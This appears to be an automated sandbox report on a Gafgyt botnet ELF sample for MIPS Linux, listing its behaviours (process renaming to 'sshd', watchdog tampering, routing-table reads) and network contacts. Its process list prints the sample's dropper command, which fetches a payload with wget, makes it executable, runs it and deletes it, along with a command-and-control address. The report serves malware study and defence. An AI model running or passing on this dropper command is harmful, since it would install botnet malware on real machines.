Analysis Overview
SHA256
93baaaabfc573289b7cea910738e996f36b616b93a40a2ecfb84d14d1a2e5da2
Threat Level: Known bad
The file 93baaaabfc573289b7cea910738e996f36b616b93a40a2ecfb84d14d1a2e5da2.elf was found to be: Known bad.
Malicious Activity Summary
Detected Gafgyt variant
Gafgyt family
Executes dropped EXE
Modifies Watchdog functionality
Changes its process name
Reads system routing table
Reads system network configuration
Writes file to tmp directory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-04-02 01:16
Signatures
Detected Gafgyt variant
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | N/A | N/A |
Gafgyt family
Analysis: behavioral1
Detonation Overview
Submitted
2024-04-02 01:16
Reported
2024-04-02 01:18
Platform
debian9-mipsel-20240226-en
Max time kernel
148s
Max time network
139s
Command Line
Signatures
Changes its process name
| Description | Indicator | Process | Target |
|---|---|---|---|
| Changes the process name, possibly in an attempt to hide itself | sshd | /tmp/93baaaabfc573289b7cea910738e996f36b616b93a40a2ecfb84d14d1a2e5da2.elf | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | /tmp/..... | /tmp/..... | N/A |
Modifies Watchdog functionality
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for modification | /dev/misc/watchdog | N/A | N/A |
| File opened for modification | /dev/watchdog | N/A | N/A |
Reads system routing table
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for reading | /proc/net/route | /tmp/93baaaabfc573289b7cea910738e996f36b616b93a40a2ecfb84d14d1a2e5da2.elf | N/A |
Reads system network configuration
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for reading | /proc/net/route | /tmp/93baaaabfc573289b7cea910738e996f36b616b93a40a2ecfb84d14d1a2e5da2.elf | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for modification | /tmp/..... | /usr/bin/wget | N/A |
Processes
/tmp/93baaaabfc573289b7cea910738e996f36b616b93a40a2ecfb84d14d1a2e5da2.elf
[/tmp/93baaaabfc573289b7cea910738e996f36b616b93a40a2ecfb84d14d1a2e5da2.elf]
/bin/sh
[/bin/sh -c wget -q http://gay.energy/.../vivid -O .....;chmod 777 .....;./.....;rm -rf .....]
/usr/bin/wget
[wget -q http://gay.energy/.../vivid -O .....]
/bin/chmod
[chmod 777 .....]
/tmp/.....
[./.....]
/bin/sh
[/bin/sh ./.....]
/bin/rm
[rm -rf .....]
Network
| Country | Destination | Domain | Proto |
|---|---|---|---|
| MD | 85.239.33.129:666 | | tcp |
| US | 1.1.1.1:53 | gay.energy | udp |
| US | 1.1.1.1:53 | gay.energy | udp |
| MD | 85.239.33.129:666 | | tcp |
| MD | 85.239.33.129:666 | | tcp |
| MD | 85.239.33.129:666 | | tcp |
| MD | 85.239.33.129:666 | | tcp |
| MD | 85.239.33.129:666 | | tcp |
| MD | 85.239.33.129:666 | | tcp |
| MD | 85.239.33.129:666 | | tcp |
| MD | 85.239.33.129:666 | | tcp |
| MD | 85.239.33.129:666 | | tcp |